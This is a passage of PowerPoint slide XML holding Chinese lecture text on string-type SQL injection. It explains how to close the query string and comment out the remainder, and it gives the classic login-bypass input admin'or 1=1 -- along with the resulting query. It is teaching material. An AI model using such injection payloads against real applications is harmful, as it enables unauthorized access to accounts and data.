              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>字符型注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</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select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>*</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from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>table</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where</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username='admin'</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" marR="22860" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="550"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>字符型注入最关键的是如何闭合</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>QL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句以及注释多余的代</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。下面</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="45">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>查询命令和</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>up</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>更 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>新命令为例说</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>明</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当查询内容为字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</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select</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from</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table</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where</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username='admin'</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" marR="19050" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="91500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="245"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当攻击者进行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入时，如果输</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</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admin</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or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>”，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>则无法进行注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。因为</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admin</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or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>”  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>会被数据库当作查询的字符</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>串</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，对应</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="45">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</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select</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from</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table</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where</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username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>=  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>'admin or</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1=1'</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" marR="5080" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="550"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这时要想进行注入，则必须注意字符串闭合问</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>题</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。如果输入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>admin'or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>就可以继续注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，  对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>select</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from</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table</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>username</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='admin'or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>--'</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
              <a:buSzPct val="92307"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-50" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>句</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>person </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>set username='username',set password='password' </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>id=1</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" marR="200660" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="540"/>
